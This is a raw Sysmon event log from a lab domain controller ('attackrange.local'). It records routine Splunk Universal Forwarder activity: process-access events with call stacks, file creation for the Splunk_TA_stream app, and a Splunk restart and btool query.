13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E56-6005-3000-00000000A301}25323928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.806{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2532C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2021-01-18 13:36:31.763 11241100x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2021-01-18 13:36:31.763 11241100x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2021-01-18 13:36:31.763 11241100x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:36:31.653{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2021-01-18 13:36:31.653 11241100x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2021-01-18 13:36:31.622 11241100x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2021-01-18 13:36:31.622 11241100x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2021-01-18 13:36:31.622 11241100x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2021-01-18 13:36:31.622 11241100x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2021-01-18 13:36:31.622 11241100x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2021-01-18 13:36:31.622 11241100x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2021-01-18 13:36:31.622 11241100x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.012{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2021-01-18 13:36:31.012 11241100x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.012{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2021-01-18 13:36:31.012 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8EE0-6005-A600-00000000A301}32443768C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.837{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 